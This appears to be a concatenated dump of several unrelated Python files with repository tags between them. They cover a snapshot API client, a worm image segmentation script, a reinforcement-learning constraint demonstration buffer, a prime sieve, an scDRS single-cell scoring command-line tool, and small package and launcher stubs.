        """List snapshots taken of volumes.

        ``page``/``per_page`` were added for consistency with the other list
        methods; when left at None they are omitted from the request, which
        preserves the previous behaviour exactly.
        """
        params = {"resource_type": "volume"}
        if page is not None:
            params["page"] = page
        if per_page is not None:
            params["per_page"] = per_page
        return self._list_snapshots(params)

    def retrieve_snapshot_by_id(self, id):
        """Fetch a single snapshot by its id."""
        return self.get_request(f"{self.endpoint}/{id}", headers=self.headers)

    def delete_snapshot_id(self, id):
        """Delete a snapshot by its id."""
        return self.delete_request(f"{self.endpoint}/{id}", headers=self.headers)
| 2.546875 | 3 |
test_segmentation.py | kulikovv/DeepWorm | 1 | 12760287 | <reponame>kulikovv/DeepWorm
from os import listdir
from os.path import join
import numpy as np
import torch
from skimage.io import imread, imsave
import matplotlib.pyplot as plt
from torch.autograd import Variable
from deepworm import get_segmentation_model
def process_image(image, net):
    """Run the segmentation network on one single-channel image.

    Normalises the image with the dataset-wide min/max stored in
    ``data/consts.npy``, adds batch and channel dimensions, and returns the
    per-pixel argmax class map as a numpy array.
    """
    # consts.npy stores a pickled dict with 'min'/'max'; allow_pickle=True is
    # required to load object arrays on numpy >= 1.16.3 (default changed).
    consts = np.load('data/consts.npy', allow_pickle=True).tolist()
    image_norm = (image - consts['min']) / (consts['max'] - consts['min']) - 0.5
    # (H, W) -> (1, 1, H, W): batch and channel axes expected by the network.
    image_norm = np.expand_dims(np.expand_dims(image_norm, 0), 0)
    vx = Variable(torch.from_numpy(image_norm).float()).cuda()
    res = net(vx)
    # Class with the highest score at each pixel.
    return np.argmax(res[0].data.cpu().numpy(), 0)
if __name__ == "__main__":
net = get_segmentation_model()
net.load_state_dict(torch.load('models/semantic_worms.t7'))
net = net.cuda()
net.eval()
basepath = 'data/target_data'
#basepath = 'data/semantic_data'
for f in [f for f in listdir(basepath) if f.endswith(".tif")][:10]:
image = imread(join(basepath, f)).astype(np.float32)
res = process_image(image, net)
plt.imshow(image)
plt.waitforbuttonpress()
plt.imshow(res)
plt.waitforbuttonpress() | 2.1875 | 2 |
ceres/constraints/constraint_demonstration.py | ph4m/constrained-rl | 21 | 12760288 | <reponame>ph4m/constrained-rl<filename>ceres/constraints/constraint_demonstration.py
# Copyright (c) IBM Corp. 2018. All Rights Reserved.
# Project name: Constrained Exploration and Recovery from Experience Shaping
# This project is licensed under the MIT License, see LICENSE
from collections import deque
import numpy as np
import os
class ConstraintDemonstration(object):
    '''
    Demonstrations used for constraint network training.
    Main attributes are state, action, and action indicator (+1 for positive, 0 for negative).
    For recovery training, also store environment snapshot.
    Action weight and level can also be stored, e.g., for prioritizing some actions over others if all cannot be properly separated (not implemented).
    '''
    __slots__ = ('snapshot', 'state', 'action', 'action_indicator', 'action_weight', 'action_level', 'is_terminal')

    def __init__(self, demonstration=None, snapshot=None, state=None, action=None, action_indicator=None, action_weight=None, action_level=None, is_terminal=None):
        if demonstration is None:
            # Build from individual fields.
            if is_terminal is None:
                is_terminal = False
            self.is_terminal = is_terminal
            if self.is_terminal:
                assert action is None, 'A terminal demonstration should not have associated actions'
            self.snapshot = snapshot
            self.state = state
            self.action = action
            self.action_indicator = action_indicator
            self.action_weight = action_weight
            self.action_level = action_level
        else:
            # Copy constructor: no other field may be passed alongside.
            assert isinstance(demonstration, ConstraintDemonstration)
            # Bug fix: 'action_level' was missing from this exclusivity check.
            for _v in (snapshot, state, action, action_indicator, action_weight, action_level, is_terminal):
                assert _v is None
            for _k in self.__slots__:
                setattr(self, _k, getattr(demonstration, _k))

    def __repr__(self):
        # Stable, sorted field dump for logging and debugging.
        repr_str_list = []
        for _k in sorted(self.__slots__):
            repr_str_list.append('{0}: {1}'.format(_k, str(getattr(self, _k))))
        repr_str = '{{{0}}}'.format(', '.join(repr_str_list))
        return repr_str

    def test_is_classified(self):
        """Return True once the demonstration has a positive/negative label."""
        return self.action_indicator is not None

    def to_dict(self):
        """Return all fields as a plain dict (used for npz serialization)."""
        d = {_k: getattr(self, _k) for _k in self.__slots__}
        return d
class ConstraintDemonstrationTrajectory(object):
    '''
    A sequence of demonstrations with functions for getting the trajectory's mid-point, sub-trajectories,
    and to disable recovery from demonstrations that are already sorted.
    '''

    def __init__(self, demonstrations=None, states=None, actions=None, action_indicators=None, action_weights=None):
        # Either a ready-made list of ConstraintDemonstration objects is given,
        # or one is built element-wise from the parallel state/action arrays.
        if demonstrations is None:
            demonstrations = []
            assert states is not None, 'Provide either demonstration list or individual content'
            for state, action, action_indicator, action_weight in zip(states, actions, action_indicators, action_weights):
                demonstration = ConstraintDemonstration(state=state, action=action, action_indicator=action_indicator, action_weight=action_weight)
                demonstrations.append(demonstration)
        else:
            for _e in demonstrations:
                assert isinstance(_e, ConstraintDemonstration)
        self.demonstrations = demonstrations
        self.length_all = len(self.demonstrations)
        # A trailing terminal demonstration is excluded from the active range.
        self.length_active = self.length_all
        if self.demonstrations[-1].is_terminal:
            self.length_active -= 1
        # [begin, end) bounds of the demonstrations still to be processed.
        self.active_demonstrations = [0, self.length_active]
        self.do_reset_after_last_active = False

    def __len__(self):
        # Deliberately ambiguous: force callers to pick the length they mean.
        raise ValueError('Ambiguous length: use attributes .length_all or .length_active')

    def __getitem__(self, i):
        return self.demonstrations[i]

    def get_midpoint(self):
        '''
        Return the mid-point (rounded down) demonstration within the active trajectory.
        '''
        assert self.length_active > 0, 'Cannot get midpoint from empty demonstrations'
        i_state = self.active_demonstrations[0] + int(self.length_active / 2)
        # With a single active demonstration left, optionally step past it so
        # the environment resets after the last active step.
        if (self.length_active == 1) and self.do_reset_after_last_active:
            i_state += 1
        assert i_state < self.length_all
        demonstration = self.demonstrations[i_state]
        assert demonstration.is_terminal or demonstration.test_is_classified()
        return i_state

    def get_active_demonstrations_from(self, begin, remove_demonstrations=False, return_copy=True):
        '''
        Get a sub-trajectory starting from a given demonstration to the last active demonstration
        '''
        end = self.active_demonstrations[1]
        demonstrations = self.demonstrations[begin:end]
        if end > begin:
            if remove_demonstrations:  # end earlier
                self.active_demonstrations[1] = begin
                self.length_active = self.active_demonstrations[1] - self.active_demonstrations[0]
        if return_copy:
            # Copies decouple the returned slice from later in-place edits.
            demonstrations = [ConstraintDemonstration(_e) for _e in demonstrations]
        is_resized = remove_demonstrations and (len(demonstrations) > 0)
        return demonstrations, is_resized

    def get_active_demonstrations_to(self, end, remove_demonstrations=False, return_copy=True):
        '''
        Get a sub-trajectory starting from the first active demonstration up to a given demonstration
        '''
        begin = self.active_demonstrations[0]
        demonstrations = self.demonstrations[begin:end]
        if end > begin:
            if remove_demonstrations:  # start later
                self.active_demonstrations[0] = end
                self.length_active = self.active_demonstrations[1] - self.active_demonstrations[0]
        if return_copy:
            demonstrations = [ConstraintDemonstration(_e) for _e in demonstrations]
        is_resized = remove_demonstrations and (len(demonstrations) > 0)
        return demonstrations, is_resized

    def get_demonstration(self, i_state, return_copy=True):
        '''
        Get a chosen demonstration within the trajectory, or copy thereof for separate processing
        '''
        demonstration = self.demonstrations[i_state]
        if return_copy:
            demonstration = ConstraintDemonstration(demonstration)
        return demonstration
class ConstraintDemonstrationBuffer(object):
    '''
    Store positive and negative demonstrations, with functions for iterating over all and write / restore.
    '''
    buffer_basename = 'constraint_demonstration_buffer.npz'

    def __init__(self, max_size=None, positive_demonstrations=None, negative_demonstrations=None, even_split=True):
        '''
        :param max_size: total capacity across both buffers (None = unbounded)
        :param positive_demonstrations: optional initial positive demonstrations
        :param negative_demonstrations: optional initial negative demonstrations
        :param even_split: if True, each buffer is capped at max_size / 2
        '''
        self.even_split = bool(even_split)
        # '== None' (not 'is None') is deliberate: max_size may come back from
        # np.load as a 0-d object array wrapping None (see restore_buffer).
        if max_size == None:
            self.max_size = None  # in case we get numpy None
            self.max_size_per_buffer = None
        else:
            self.max_size = int(max_size)
            self.max_size_per_buffer = int(self.max_size / 2) if self.even_split else self.max_size
        if positive_demonstrations is None:
            self.positive_demonstrations = deque(maxlen=self.max_size_per_buffer)
        else:
            self.positive_demonstrations = deque(positive_demonstrations, maxlen=self.max_size_per_buffer)
        if negative_demonstrations is None:
            self.negative_demonstrations = deque(maxlen=self.max_size_per_buffer)
        else:
            self.negative_demonstrations = deque(negative_demonstrations, maxlen=self.max_size_per_buffer)

    def __len__(self):
        return len(self.positive_demonstrations) + len(self.negative_demonstrations)

    def add_demonstration(self, demonstration):
        '''
        Store a positive or negative demonstration into the appropriate buffer and remove old demonstrations if using a shared max size.
        '''
        assert isinstance(demonstration, ConstraintDemonstration)
        buffer_insert = self.positive_demonstrations if demonstration.action_indicator else self.negative_demonstrations
        buffer_insert.append(demonstration)
        # Bug fix: this condition previously read an undefined local
        # 'max_size' (NameError whenever even_split=False).
        if not self.even_split and self.max_size is not None:  # check the total size
            if len(self.positive_demonstrations) + len(self.negative_demonstrations) > self.max_size:
                buffer_insert.popleft()

    def get_random_sample(self, action_indicator=None):
        '''
        Get a random demonstration from positive or negative if specified, otherwise random.
        '''
        if action_indicator is None:
            action_indicator = np.random.rand() < 0.5
        buffer_sample = self.positive_demonstrations if action_indicator else self.negative_demonstrations
        assert len(buffer_sample) > 0, 'Cannot get sample from empty buffer'
        i_sample = np.random.randint(0, len(buffer_sample))
        demonstration = buffer_sample[i_sample]
        return demonstration

    def get_random_batch(self, batch_size, balance_positive_negative=False):
        '''
        Get a random batch of demonstrations, optionally balanced between positive and negative.
        '''
        if len(self.positive_demonstrations) == 0:
            if len(self.negative_demonstrations) == 0:
                raise ValueError('Cannot get batch from empty buffer')
            else:
                action_indicators = [0.] * batch_size
        else:
            if len(self.negative_demonstrations) == 0:
                action_indicators = [1.] * batch_size
            else:
                action_indicators = [np.random.rand() for _ in range(batch_size)]
                if balance_positive_negative:  # same probability to get positive or negative
                    action_indicators = [_i < 0.5 for _i in action_indicators]
                else:
                    # Sample proportionally to the buffer sizes.
                    threshold_positive = (float(len(self.positive_demonstrations)) / (len(self.positive_demonstrations) + len(self.negative_demonstrations)))
                    action_indicators = [_i < threshold_positive for _i in action_indicators]
        batch = [self.get_random_sample(action_indicator=_i) for _i in action_indicators]
        return batch

    def iterate_epoch(self, batch_size):
        '''
        Return random batches, without balancing between positive and negative demonstrations.
        '''
        n_all = len(self.positive_demonstrations) + len(self.negative_demonstrations)
        i_shuffle = np.arange(n_all)
        np.random.shuffle(i_shuffle)
        n_batches = int(np.ceil(n_all / batch_size))
        for i_batch in range(n_batches):
            i_demonstrations_batch = i_shuffle[(i_batch * batch_size):((i_batch + 1) * batch_size)]
            demonstrations = [self.get_demonstration_from_global_index(_i) for _i in i_demonstrations_batch]
            yield demonstrations

    def get_demonstration_from_global_index(self, i):
        '''
        Return a demonstration from an index between 0 and n_positive + n_negative.
        '''
        if i < len(self.positive_demonstrations):
            return self.positive_demonstrations[i]
        else:
            return self.negative_demonstrations[i - len(self.positive_demonstrations)]

    def get_shuffle_indices(self, n_el, n_max):
        '''
        Build random indices ranging from 0 to n_el until a maximum size n_max is reached, repeating indices minimally.
        '''
        assert n_el > 0, 'Empty buffer'
        if n_el == n_max:
            i_shuffle = np.arange(n_el)
            np.random.shuffle(i_shuffle)
        else:
            # Concatenate just enough full permutations, then truncate.
            n_shuffle = int(np.ceil(n_max / n_el))
            i_shuffle_list = []
            for _ in range(n_shuffle):
                i_shuffle_loc = np.arange(n_el)
                np.random.shuffle(i_shuffle_loc)
                i_shuffle_list.append(i_shuffle_loc)
            i_shuffle = np.concatenate(i_shuffle_list)  # gather as single list
            i_shuffle = i_shuffle[:n_max]  # resize to match size
        return i_shuffle

    def iterate_epoch_balanced(self, batch_size, n_max=0):
        '''
        Return batches such that every demonstration of the largest buffer appears exactly once,
        with demonstrations of the other buffer re-appearing a minimum number of times to balance batches
        '''
        n_positive = len(self.positive_demonstrations)
        n_negative = len(self.negative_demonstrations)
        if n_max == 0:
            n_max = max(n_positive, n_negative)
        i_shuffle_positive = self.get_shuffle_indices(n_positive, n_max)
        i_shuffle_negative = self.get_shuffle_indices(n_negative, n_max)
        n_all = 2 * n_max
        i_positive = 0
        i_negative = 0
        n_batches = int(np.ceil(n_all / batch_size))
        for i_batch in range(n_batches):
            demonstrations = batch_size * [None]
            for i_demonstration in range(batch_size):
                is_out_positive = i_positive >= len(i_shuffle_positive)
                is_out_negative = i_negative >= len(i_shuffle_negative)
                if is_out_positive and is_out_negative:  # both buffers have been completely iterated through
                    demonstrations = demonstrations[:i_demonstration]
                    break
                elif (not is_out_positive) and (not is_out_negative):  # both buffers still have demonstrations
                    do_add_positive = np.random.rand() < 0.5
                else:  # only one buffer has not been completely iterated through
                    do_add_positive = not is_out_positive
                if do_add_positive:
                    demonstrations[i_demonstration] = self.positive_demonstrations[i_shuffle_positive[i_positive]]
                    i_positive += 1
                else:
                    demonstrations[i_demonstration] = self.negative_demonstrations[i_shuffle_negative[i_negative]]
                    i_negative += 1
            yield demonstrations

    def check_path_backup(self, path_backup):
        '''
        Build path to backup file if a directory is provided, otherwise check the extension of the provided file path.
        '''
        if os.path.isdir(path_backup):
            path_backup = os.path.join(path_backup, self.buffer_basename)
        elif not path_backup[-4:] == '.npz':
            path_backup = os.path.join(os.path.dirname(path_backup), self.buffer_basename)
        return path_backup

    def init_saver(self, path_backup):
        '''
        Build backup path (required before calling write() without arguments).
        '''
        self.path_backup = self.check_path_backup(path_backup)

    def write(self, path_backup=None, verbose=True):
        '''
        Save buffer to disk
        '''
        if path_backup is None:
            path_backup = self.path_backup
        buffer_as_dict = {'max_size': self.max_size,
                          'positive_demonstrations': [_e.to_dict() for _e in self.positive_demonstrations],
                          'negative_demonstrations': [_e.to_dict() for _e in self.negative_demonstrations],
                          'even_split': self.even_split}
        np.savez(path_backup, **buffer_as_dict)
        if verbose:
            print('Wrote buffer backup: {0} ({1} positive, {2} negative)'.format(path_backup, len(self.positive_demonstrations), len(self.negative_demonstrations)))

    @classmethod
    def from_backup(cls, path_backup, verbose=False):
        '''
        Build buffer from path
        '''
        demonstration_buffer = cls()
        demonstration_buffer.restore_buffer(path_backup, keep_size=False, keep_newest=True, verbose=verbose)
        return demonstration_buffer

    def restore_buffer(self, path_backup, keep_size=True, keep_newest=True, verbose=False):
        '''
        Restore buffer from path
        '''
        if keep_size:
            max_size = self.max_size
        path_backup = self.check_path_backup(path_backup)
        # Bug fix: the archive stores object arrays (lists of dicts), so
        # allow_pickle=True is required on numpy >= 1.16.3.
        buffer_as_dict = np.load(path_backup, allow_pickle=True)
        positive_demonstrations = [ConstraintDemonstration(**_d) for _d in buffer_as_dict['positive_demonstrations']]
        negative_demonstrations = [ConstraintDemonstration(**_d) for _d in buffer_as_dict['negative_demonstrations']]
        self.__init__(max_size=buffer_as_dict['max_size'],
                      positive_demonstrations=positive_demonstrations,
                      negative_demonstrations=negative_demonstrations,
                      even_split=buffer_as_dict['even_split'])
        if keep_size:
            self.resize(max_size, keep_newest=keep_newest)
        if verbose:
            print('Load buffer backup: {0} ({1} positive, {2} negative)'.format(path_backup, len(self.positive_demonstrations), len(self.negative_demonstrations)))

    def resize(self, new_max_size, keep_newest=True):
        '''
        Resize buffer and remove excess demonstrations, new or old.
        '''
        if self.max_size == new_max_size:
            return
        self.max_size = new_max_size
        if self.even_split:
            self.max_size_per_buffer = int(self.max_size / 2)
            keep_positive = min(len(self.positive_demonstrations), self.max_size_per_buffer)
            keep_negative = min(len(self.negative_demonstrations), self.max_size_per_buffer)
        else:
            self.max_size_per_buffer = self.max_size
            # NOTE(review): if the buffers do not exceed the new size,
            # ratio_excess is <= 0 and the divisions below misbehave — confirm
            # this path is only taken when shrinking an over-full buffer.
            total_excess = len(self.positive_demonstrations) + len(self.negative_demonstrations) - self.max_size
            ratio_excess = total_excess / self.max_size
            keep_positive = int(len(self.positive_demonstrations) / ratio_excess)
            keep_negative = int(len(self.negative_demonstrations) / ratio_excess)
        if keep_newest:
            last_positive = len(self.positive_demonstrations)
            first_positive = last_positive - keep_positive
            last_negative = len(self.negative_demonstrations)
            first_negative = last_negative - keep_negative
        else:
            first_positive = 0
            first_negative = 0
            last_positive = first_positive + keep_positive
            last_negative = first_negative + keep_negative
        # Consistency fix: cap each deque at the per-buffer budget as in
        # __init__ (previously maxlen=self.max_size, letting one buffer
        # exceed its half of an even split).
        self.positive_demonstrations = deque([self.positive_demonstrations[_i] for _i in range(first_positive, last_positive)], maxlen=self.max_size_per_buffer)
        self.negative_demonstrations = deque([self.negative_demonstrations[_i] for _i in range(first_negative, last_negative)], maxlen=self.max_size_per_buffer)

    def empty(self):
        '''
        Empty buffer
        '''
        # Consistency fix: per-buffer cap, matching __init__ (was max_size).
        self.positive_demonstrations = deque(maxlen=self.max_size_per_buffer)
        self.negative_demonstrations = deque(maxlen=self.max_size_per_buffer)
def play_buffer():
    '''
    Load and replay demonstrations

    Interactive command loop: Enter replays the next demonstration of the
    current buffer, 'g'/'b' switch between positive/negative buffers, 'q'
    quits.  Requires --constraint_demonstration_buffer and a ResetterEnv.
    '''
    # Local imports keep the heavy ceres/gym dependencies out of module load.
    from ceres.tools import ExtraArgs
    from ceres.envs import ResetterEnv
    import gym
    extra_args = ExtraArgs()
    assert len(extra_args.constraint_demonstration_buffer) > 0, 'Required argument --constraint_demonstration_buffer'
    constraint_demonstration_buffer = ConstraintDemonstrationBuffer.from_backup(extra_args.constraint_demonstration_buffer)
    env = gym.make(extra_args.env_id)
    env = env.unwrapped
    assert isinstance(env, ResetterEnv)
    env.reset()
    # Restore the environment to the first positive demonstration's snapshot.
    demonstration = constraint_demonstration_buffer.positive_demonstrations[0]
    env.reset_and_restore(snapshot=demonstration.snapshot)
    if extra_args.render:
        env.render(mode='human')
    restore_positive = True
    i_positive = 0
    i_negative = 0
    valid_commands_str = '[Enter]: play next in current buffer, [g]: switch to positive buffer, [b]: switch to negative buffer, [q] to quit'
    while True:
        # Fall back to the other buffer if the selected one is empty.
        if restore_positive:
            if len(constraint_demonstration_buffer.positive_demonstrations) == 0:
                print('No positive example, switch to negative')
                restore_positive = False
                assert len(constraint_demonstration_buffer.negative_demonstrations) > 0
        else:
            if len(constraint_demonstration_buffer.negative_demonstrations) == 0:
                print('No negative example, switch to positive')
                restore_positive = True
                assert len(constraint_demonstration_buffer.positive_demonstrations) > 0
        current_buffer = constraint_demonstration_buffer.positive_demonstrations if restore_positive else constraint_demonstration_buffer.negative_demonstrations
        current_index = i_positive if restore_positive else i_negative
        # NOTE(review): '>' lets current_index == len(current_buffer) through,
        # which would raise IndexError below — likely should be '>=' (confirm).
        if current_index > len(current_buffer):
            current_index = 0
        buffer_info_str = 'Current buffer: {0} ({1}/{2})'.format(('positive' if restore_positive else 'negative'), current_index, len(current_buffer)-1)
        input_str = '{0}\n  Action? {1}\n'.format(buffer_info_str, valid_commands_str)
        command = input(input_str)
        if command == '':
            # Replay: restore the stored snapshot, then execute the action.
            demonstration = current_buffer[current_index]
            env.reset_and_restore(snapshot=demonstration.snapshot)
            if extra_args.render:
                env.render(mode='human')
            env.step(demonstration.action)
            print('  Restored state {0}, played action {1}'.format(demonstration.state, demonstration.action))
            if extra_args.render:
                env.render(mode='human')
            if restore_positive:
                i_positive += 1
            else:
                i_negative += 1
        elif command == 'b':
            restore_positive = False
        elif command == 'g':
            restore_positive = True
        elif command == 'q':
            return
        else:
            print('Invalid command {0}. Possible commands: {1}'.format(command, valid_commands_str))
if __name__ == '__main__':
    # Interactive replay utility; see play_buffer() for the command loop.
    play_buffer()
| 2 | 2 |
app/views.py | mediben/PrimeNumbers | 0 | 12760289 |
def get_primes(n):
    """Return the list of all primes strictly below ``n``.

    Implements the Sieve of Eratosthenes: ``nonprimes[i]`` stays False while
    ``i`` is presumed prime and is flipped to True once a factor is found.

    Fixes: returns [] for ``n < 2`` (previously raised IndexError); drops the
    unused ``count`` accumulator; starts marking multiples at ``i*i`` since
    smaller multiples were already marked by smaller primes.
    """
    if n < 2:
        return []
    # False = prime (so far), True = composite.
    nonprimes = n * [False]
    nonprimes[0] = nonprimes[1] = True
    prime_numbers = []
    for i in range(2, n):
        if not nonprimes[i]:
            prime_numbers.append(i)
            for j in range(i * i, n, i):
                nonprimes[j] = True
    return prime_numbers
| 3.765625 | 4 |
compute_score.py | martinjzhang/scDRS | 24 | 12760290 | <reponame>martinjzhang/scDRS
import scanpy as sc
from anndata import read_h5ad
import pandas as pd
import numpy as np
import scipy as sp
import os
import time
import argparse
from statsmodels.stats.multitest import multipletests
import scdrs
"""
# Fixit
# Todo
- Implement scdrs.method.proprocess to incorporate sparse_reg_out and sparse_compute_stats
- "gene_weight" argument needs to be tested
- Check the situation where df_cov does not explicitly contain "const" but contains a linear combinition of const
# Finished
- Implement a memory efficient version
- Add --n_ctrl (default value 500)
- Add --cov_file option to regress out covariates stored in COV_FILE before feeding into the score function
- Add --ctrl_match_opt='mean_var': use mean- and var- matched control genes
- Change name from scTRS to scdrs (072721)
- Fixed: Warning for compute_score: Trying to set attribute `.X` of view, copying. (did: v_norm_score = v_raw_score.copy())
"""
VERSION = "0.0.1"
VERSION = "beta"
def convert_species_name(species):
    """Normalise a species name to its canonical short identifier.

    Accepts common spellings of mouse and human; raises ValueError for any
    unsupported species.
    """
    aliases = {
        "mmusculus": ["Mouse", "mouse", "Mus_musculus", "mus_musculus", "mmusculus"],
        "hsapiens": ["Human", "human", "Homo_sapiens", "homo_sapiens", "hsapiens"],
    }
    for canonical, spellings in aliases.items():
        if species in spellings:
            return canonical
    raise ValueError("# compute_score: species name %s not supported" % species)
def main(args):
    """Run the scDRS scoring pipeline end-to-end from parsed CLI arguments.

    Loads the .h5ad expression data and gene-set file, optionally regresses
    out covariates, preprocesses, then computes and writes per-trait scores
    to ``args.out_folder``.
    """
    sys_start_time = time.time()
    MASTHEAD = "******************************************************************************\n"
    MASTHEAD += "* Single-cell disease relevance score (scDRS)\n"
    MASTHEAD += "* Version %s\n" % VERSION
    MASTHEAD += "* <NAME> and <NAME>\n"
    MASTHEAD += "* HSPH / Broad Institute / UCLA\n"
    MASTHEAD += "* MIT License\n"
    MASTHEAD += "******************************************************************************\n"
    ###########################################################################################
    ######                                    Parse Options                              ######
    ###########################################################################################
    H5AD_FILE = args.h5ad_file
    H5AD_SPECIES = args.h5ad_species
    COV_FILE = args.cov_file
    GS_FILE = args.gs_file
    GS_SPECIES = args.gs_species
    CTRL_MATCH_OPT = args.ctrl_match_opt
    WEIGHT_OPT = args.weight_opt
    # Boolean flags arrive as the strings "True"/"False" from argparse.
    FLAG_FILTER = args.flag_filter == "True"
    FLAG_RAW_COUNT = args.flag_raw_count == "True"
    N_CTRL = int(args.n_ctrl)
    FLAG_RETURN_CTRL_RAW_SCORE = args.flag_return_ctrl_raw_score == "True"
    FLAG_RETURN_CTRL_NORM_SCORE = args.flag_return_ctrl_norm_score == "True"
    # NOTE(review): FLAG_SPARSE is parsed but never used below — confirm
    # whether the sparse implementation is still pending.
    FLAG_SPARSE = args.flag_sparse == "True"
    OUT_FOLDER = args.out_folder
    # Normalise species names only when they differ; identical names are
    # accepted verbatim (any species supported in that case).
    if H5AD_SPECIES != GS_SPECIES:
        H5AD_SPECIES = convert_species_name(H5AD_SPECIES)
        GS_SPECIES = convert_species_name(GS_SPECIES)
    header = MASTHEAD
    header += "Call: ./compute_score.py \\\n"
    header += "--h5ad_file %s\\\n" % H5AD_FILE
    header += "--h5ad_species %s\\\n" % H5AD_SPECIES
    header += "--cov_file %s\\\n" % COV_FILE
    header += "--gs_file %s\\\n" % GS_FILE
    header += "--gs_species %s\\\n" % GS_SPECIES
    header += "--ctrl_match_opt %s\\\n" % CTRL_MATCH_OPT
    header += "--weight_opt %s\\\n" % WEIGHT_OPT
    header += "--flag_filter %s\\\n" % FLAG_FILTER
    header += "--flag_raw_count %s\\\n" % FLAG_RAW_COUNT
    header += "--n_ctrl %d\\\n" % N_CTRL
    header += "--flag_return_ctrl_raw_score %s\\\n" % FLAG_RETURN_CTRL_RAW_SCORE
    header += "--flag_return_ctrl_norm_score %s\\\n" % FLAG_RETURN_CTRL_NORM_SCORE
    header += "--out_folder %s\n" % OUT_FOLDER
    print(header)
    # Check options
    if H5AD_SPECIES != GS_SPECIES:
        if H5AD_SPECIES not in ["mmusculus", "hsapiens"]:
            raise ValueError(
                "--h5ad_species needs to be one of [mmusculus, hsapiens] "
                "unless --h5ad_species==--gs_species"
            )
        if GS_SPECIES not in ["mmusculus", "hsapiens"]:
            raise ValueError(
                "--gs_species needs to be one of [mmusculus, hsapiens] "
                "unless --h5ad_species==--gs_species"
            )
    if CTRL_MATCH_OPT not in ["mean", "mean_var"]:
        raise ValueError("--ctrl_match_opt needs to be one of [mean, mean_var]")
    if WEIGHT_OPT not in ["uniform", "vs", "inv_std", "od"]:
        raise ValueError("--weight_opt needs to be one of [uniform, vs, inv_std, od]")
    ###########################################################################################
    ######                                     Load data                                 ######
    ###########################################################################################
    print("Load data:")
    # Load .h5ad file
    adata = read_h5ad(H5AD_FILE)
    if FLAG_FILTER:
        # Basic QC: drop near-empty cells and rarely expressed genes.
        sc.pp.filter_cells(adata, min_genes=250)
        sc.pp.filter_genes(adata, min_cells=50)
    if FLAG_RAW_COUNT:
        # Size-factor normalisation followed by log1p transform.
        sc.pp.normalize_per_cell(adata, counts_per_cell_after=1e4)
        sc.pp.log1p(adata)
    print(
        "--h5ad_file loaded: n_cell=%d, n_gene=%d (sys_time=%0.1fs)"
        % (adata.shape[0], adata.shape[1], time.time() - sys_start_time)
    )
    # adata = adata[0:500,:].copy()
    # Load .cov file and regress out covariates
    if COV_FILE is not None:
        df_cov = pd.read_csv(COV_FILE, sep="\t", index_col=0)
    else:
        df_cov = None
    # Load .gs file, convert species if needed and merge with adata.var_names
    dict_gs = scdrs.util.load_gs(
        GS_FILE,
        src_species=GS_SPECIES,
        dst_species=H5AD_SPECIES,
        to_intersect=adata.var_names,
    )
    print(
        "--gs_file loaded: n_geneset=%d (sys_time=%0.1fs)"
        % (len(dict_gs), time.time() - sys_start_time)
    )
    ###########################################################################################
    ######                                  Computation                                  ######
    ###########################################################################################
    # Preprocess
    scdrs.preprocess(adata, cov=df_cov, n_mean_bin=20, n_var_bin=20, copy=False)
    # Compute score
    print("Compute score:")
    for trait in dict_gs:
        gene_list, gene_weights = dict_gs[trait]
        # Skip tiny gene sets: scores would be too noisy to be meaningful.
        if len(gene_list) < 10:
            print(
                "trait=%s: skipped due to small size (n_gene=%d, sys_time=%0.1fs)"
                % (trait, len(gene_list), time.time() - sys_start_time)
            )
            continue
        df_res = scdrs.score_cell(
            adata,
            gene_list,
            gene_weight=gene_weights,
            ctrl_match_key=CTRL_MATCH_OPT,
            n_ctrl=N_CTRL,
            weight_opt=WEIGHT_OPT,
            return_ctrl_raw_score=FLAG_RETURN_CTRL_RAW_SCORE,
            return_ctrl_norm_score=FLAG_RETURN_CTRL_NORM_SCORE,
            verbose=False,
        )
        # First six columns are the summary score table.
        df_res.iloc[:, 0:6].to_csv(
            os.path.join(OUT_FOLDER, "%s.score.gz" % trait),
            sep="\t",
            index=True,
            compression="gzip",
        )
        # Bitwise '|' on Python bools is equivalent to 'or' here.
        if FLAG_RETURN_CTRL_RAW_SCORE | FLAG_RETURN_CTRL_NORM_SCORE:
            df_res.to_csv(
                os.path.join(OUT_FOLDER, "%s.full_score.gz" % trait),
                sep="\t",
                index=True,
                compression="gzip",
            )
        # Benjamini-Hochberg FDR over the per-cell p-values, reported at two
        # conventional thresholds.
        v_fdr = multipletests(df_res["pval"].values, method="fdr_bh")[1]
        n_rej_01 = (v_fdr < 0.1).sum()
        n_rej_02 = (v_fdr < 0.2).sum()
        print(
            "Gene set %s (n_gene=%d): %d/%d FDR<0.1 cells, %d/%d FDR<0.2 cells (sys_time=%0.1fs)"
            % (
                trait,
                len(gene_list),
                n_rej_01,
                df_res.shape[0],
                n_rej_02,
                df_res.shape[0],
                time.time() - sys_start_time,
            )
        )
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="compute score")
parser.add_argument("--h5ad_file", type=str, required=True)
parser.add_argument(
"--h5ad_species", type=str, required=True, help="one of [hsapiens, mmusculus]"
)
parser.add_argument("--cov_file", type=str, required=False, default=None)
parser.add_argument("--gs_file", type=str, required=True)
parser.add_argument(
"--gs_species", type=str, required=True, help="one of [hsapiens, mmusculus]"
)
parser.add_argument(
"--ctrl_match_opt", type=str, required=False, default="mean_var"
)
parser.add_argument("--weight_opt", type=str, required=False, default="vs")
parser.add_argument(
"--flag_sparse",
type=str,
required=False,
default="False",
help="If to use a sparse implementation, which leverages the sparsity of the data."
"The appropriate usage place would be a highly sparse count matrix in adata, and one need to correct for covarates",
)
parser.add_argument(
"--flag_filter",
type=str,
required=False,
default="True",
help="If to apply cell and gene filters to the h5ad_file data",
)
parser.add_argument(
"--flag_raw_count",
type=str,
required=False,
default="True",
help="If True, apply size factor normalization and log1p transformation",
)
parser.add_argument(
"--n_ctrl",
type=int,
required=False,
default=1000,
help="Number of control genes",
)
parser.add_argument(
"--flag_return_ctrl_raw_score",
type=str,
required=False,
default="False",
help="If True, return raw control scores",
)
parser.add_argument(
"--flag_return_ctrl_norm_score",
type=str,
required=False,
default="False",
help="If True, return normalized control scores",
)
parser.add_argument(
"--out_folder",
type=str,
required=True,
help="Save file at out_folder/trait.score.gz",
)
args = parser.parse_args()
main(args) | 2.3125 | 2 |
venv/Lib/site-packages/dask_ml/cluster/__init__.py | ZhangQingsen/CISC849Proj | 803 | 12760291 | <gh_stars>100-1000
"""Unsupervised Clustering Algorithms"""
from .k_means import KMeans # noqa
from .spectral import SpectralClustering # noqa
| 1.226563 | 1 |
bin/agent.py | johnblackford/agent | 2 | 12760292 | #! /usr/bin/env python
import sys
import runpy
sys.path.insert(0, "/Users/jblackford/Development/agent")
if __name__ == '__main__':
runpy.run_module("agent.main", run_name="__main__")
